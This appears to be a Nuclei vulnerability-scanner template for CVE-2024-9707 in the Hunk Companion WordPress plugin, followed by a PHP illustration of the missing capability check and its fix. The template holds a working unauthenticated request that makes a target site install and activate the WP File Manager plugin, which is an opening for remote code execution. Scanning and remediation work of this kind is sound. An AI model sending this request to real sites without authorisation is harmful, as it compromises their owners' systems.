id: CVE-2024-9707

info:
  name: Hunk Companion <= 1.8.4 - Arbitrary Plugin Installation
  author: DhiyaneshDK
  severity: critical
  description: |
    The Hunk Companion plugin for WordPress is vulnerable to unauthorized plugin installation/activation due to a missing capability check on the /wp-json/hc/v1/themehunk-import REST API endpoint in all versions up to, and including, 1.8.4. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated.
  impact: |
    Unauthenticated attackers can install and activate arbitrary WordPress plugins, potentially achieving remote code execution if a vulnerable plugin is installed and activated on the target site.
  remediation: |
    Update Hunk Companion plugin to a version later than 1.8.4 that implements proper capability checks on the /wp-json/hc/v1/themehunk-import REST API endpoint.
  reference:
    - https://wordpress.org/plugins/hunk-companion/
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/9c101fca-037c-4bed-9dc7-baa021a8b59c?source=cve
    - https://github.com/iSee857/CVE-PoC/blob/main/WordPress_Hunk_Companion(CVE-2024-9707).py
    - https://github.com/RandomRobbieBF/CVE-2024-9707
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9707
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-9707
    cwe-id: CWE-862
    epss-score: 0.90276
    epss-percentile: 0.99613
    cpe: cpe:2.3:a:themehunk:hunk_companion:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: themehunk
    product: hunk_companion
    framework: wordpress
    fofa-query: body="/wp-content/plugins/hunk-companion/"
  tags: cve,cve2024,wp,wp-plugin,wordpress,hunk-companion,intrusive,vkev,vuln

http:
  - raw:
      - |
        POST /wp-json/hc/v1/themehunk-import HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"params": {"templateType": "free", "plugin": {"wp-file-manager": "Wp File Manager"}, "allPlugins": [{"wp-file-manager": "wp-file-manager/wp-file-manager.php"}], "builder": "gogo", "themeSlug": "gogo", "proThemePlugin": "wp-file-manager", "tmplFreePro": "plugin", "wpUrl": "https://downloads.wordpress.org/", "thUrl": "https://themehunk.com/wp/data/"}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"\"https:\\\/\\\/'

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a826d814486e76a30c4ffa41534032a3d06b249a3638133bb6ed40ff83424d0d022100b35d853cf9c2a80ec418851d5219ccc235306e6dc1990e0f81c644ac3015888f:922c64590222798bb761d5b6d8e72950
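The CWE-862 defect the description names, shown as an added illustration rather than Hunk Companion's own source (which this template does not contain): a WordPress REST route registered with no capability check beside the remediated form, whose permission callback requires the install_plugins and activate_plugins capabilities and whose handler allow-lists the plugin slug instead of trusting the request body. The namespace, route paths, function names and allow-list entry are assumed placeholders.

```php
<?php
// Added illustration of a missing-authorization (CWE-862) REST route in
// WordPress. Names are assumed; this is not the Hunk Companion plugin's code.
add_action( 'rest_api_init', function () {
    // VULNERABLE pattern: '__return_true' lets any unauthenticated request
    // reach a handler that installs and activates plugins.
    register_rest_route( 'example/v1', '/import-insecure', array(
        'methods'             => 'POST',
        'callback'            => 'example_import_handler',
        'permission_callback' => '__return_true',
    ) );

    // REMEDIATED pattern: the permission callback runs before the handler
    // and demands the capabilities the action actually requires.
    register_rest_route( 'example/v1', '/import', array(
        'methods'             => 'POST',
        'callback'            => 'example_import_handler',
        'permission_callback' => 'example_import_permission',
    ) );
} );

function example_import_permission( WP_REST_Request $request ) {
    // Cookie-authenticated REST calls only count as logged in when they
    // carry a valid X-WP-Nonce header, so this also covers CSRF.
    if ( ! is_user_logged_in() ) {
        return new WP_Error( 'rest_forbidden', 'Authentication required.', array( 'status' => 401 ) );
    }
    // Installing and activating plugins is an administrator-level action;
    // check both capabilities rather than a weaker one such as edit_posts.
    if ( ! current_user_can( 'install_plugins' ) || ! current_user_can( 'activate_plugins' ) ) {
        return new WP_Error( 'rest_forbidden', 'Insufficient capability.', array( 'status' => 403 ) );
    }
    return true;
}

function example_import_handler( WP_REST_Request $request ) {
    $params  = $request->get_json_params();
    // Allow-list the installable slugs; never install whatever the body names.
    $allowed = array( 'example-free-plugin' ); // assumed placeholder slug
    $slug    = isset( $params['proThemePlugin'] ) ? sanitize_key( $params['proThemePlugin'] ) : '';
    if ( ! in_array( $slug, $allowed, true ) ) {
        return new WP_Error( 'rest_invalid_param', 'Plugin not allowed.', array( 'status' => 400 ) );
    }
    // The actual install/activate step (Plugin_Upgrader, activate_plugin()) would follow here.
    return rest_ensure_response( array( 'installed' => $slug ) );
}
```

For detection, a request to such an import endpoint from an unauthenticated session, or one whose response lists plugin download URLs as the matcher above looks for, is the signal to alert on.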